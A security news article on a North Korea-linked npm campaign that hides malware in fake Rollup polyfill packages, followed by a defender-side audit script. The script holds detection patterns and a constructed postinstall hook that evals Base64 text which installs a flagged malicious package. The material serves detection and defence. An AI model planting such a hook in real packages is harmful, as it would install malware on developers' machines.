North Korean Hackers Hide Malware in Fake Rollup npm Packages
Security researchers at JFrog have uncovered a new North Korea-linked software supply chain campaign targeting JavaScript developers through malicious npm packages disguised as legitimate Rollup polyfill tooling. The two primary packages, "rollup-packages-polyfill-core" and "rollup-runtime-polyfill-core," closely mimic the well-known "rollup-plugin-polyfill-node" project, copying its description, repository metadata, and package structure to blend into a developer's dependency review process. Four additional packages—quirky-token, react-icon-svgs, rollup-plugin-polyfill-connect, and swift-parse-stream—were also identified and have since been removed from the npm registry. The campaign mirrors tactics used in prior Lazarus Group operations, layering the payloads so each package installs a second-stage loader to obscure the true intent.
The attack chain begins with a Base64-encoded npm install command hidden inside the primary packages, which pulls in one of the second-stage loaders. These second-stage packages are dressed up as SVG sanitization utilities but, once executed, they fetch a JSON object from JSONKeeper and pass the contents of its "model" field to eval() to run the embedded JavaScript. The payload performs environmental checks to evade cloud development environments, sandboxes, serverless runtimes, and analysis infrastructure before reaching out to a command-and-control server at 216.126.236[.]244 to download an encrypted JavaScript loader. Developers who suspect exposure can check the hosting infrastructure behind suspicious domains with a WHOIS lookup and use a port scanner to find unauthorized listeners opened on compromised workstations.
Once decrypted, the payload functions as a remote access trojan, enabling interactive terminal sessions, arbitrary command execution, screenshot capture, process termination, and Windows-specific mouse and keyboard manipulation. This toolkit aligns with the BeaverTail and OtterCookie malware families previously tied to the Contagious Interview campaign, in which Panther Labs reported 108 malicious npm packages across 261 versions, including "rollup-plugin-polyfill-route" published in March 2026. The recurrence of Rollup-themed typosquats suggests North Korean operators are refining a repeatable playbook that exploits developer trust in well-known build-tool ecosystems.
Developers and security teams are urged to audit their npm dependency trees for any of the six flagged packages, rotate credentials for systems that may have executed them, and review build server logs for outbound connections to 216.126.236[.]244. Given the credential-theft focus of this campaign, affected users should also verify that their developer accounts have not been compromised using an email breach checker and update any reused passwords after testing their strength with a password checker.
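As an added defender-side example (not code from JFrog's report or from the article), the following Node.js script audits a package.json for the two indicators described above: a dependency on any of the six flagged package names, and a lifecycle script that hides an npm install command inside a Base64 string. The sample package.json at the bottom is constructed for the demonstration; the flagged package names are the ones the article lists.

```javascript
// Package names named in the article; everything else here is constructed.
const FLAGGED_PACKAGES = new Set([
  "rollup-packages-polyfill-core",
  "rollup-runtime-polyfill-core",
  "quirky-token",
  "react-icon-svgs",
  "rollup-plugin-polyfill-connect",
  "swift-parse-stream",
]);

const LIFECYCLE_SCRIPTS = ["preinstall", "install", "postinstall", "prepare"];
// A run of Base64 text long enough to carry a command (20+ chars, optional padding).
const BASE64_RUN = /[A-Za-z0-9+/]{20,}={0,2}/g;
const INSTALL_CMD = /\bnpm\s+(i|install|add)\b|\byarn\s+add\b|\bpnpm\s+(i|install|add)\b/;

// Decode a Base64 candidate; return null unless it decodes to printable ASCII text.
function decodeIfText(run) {
  const text = Buffer.from(run, "base64").toString("utf8");
  return /^[\x09\x0a\x0d\x20-\x7e]+$/.test(text) ? text : null;
}

// Returns a list of findings: flagged dependencies and hidden install commands.
function auditPackageJson(pkg) {
  const findings = [];
  for (const field of ["dependencies", "devDependencies", "optionalDependencies"]) {
    for (const name of Object.keys(pkg[field] || {})) {
      if (FLAGGED_PACKAGES.has(name)) findings.push({ kind: "flagged-dependency", name });
    }
  }
  for (const script of LIFECYCLE_SCRIPTS) {
    const cmd = (pkg.scripts || {})[script];
    if (!cmd) continue;
    for (const run of cmd.match(BASE64_RUN) || []) {
      const decoded = decodeIfText(run);
      if (decoded && INSTALL_CMD.test(decoded)) {
        findings.push({ kind: "hidden-install", script, decoded });
      }
    }
  }
  return findings;
}

// Constructed sample: a postinstall hook that hides "npm install <flagged package>"
// behind Base64, mirroring the first stage the article describes.
const HIDDEN = Buffer.from(
  "require('child_process').execSync('npm install rollup-plugin-polyfill-connect')"
).toString("base64");
const SAMPLE_PKG = {
  name: "constructed-sample",
  scripts: { postinstall: `node -e "eval(Buffer.from('${HIDDEN}','base64').toString())"` },
  dependencies: { "rollup-plugin-polyfill-node": "*" },
};

console.log(JSON.stringify(auditPackageJson(SAMPLE_PKG), null, 2));
```

Point it at each package.json in node_modules (and your own) to cover transitive dependencies; a clean result does not clear packages whose loader is fetched only at runtime, as the second stage here is.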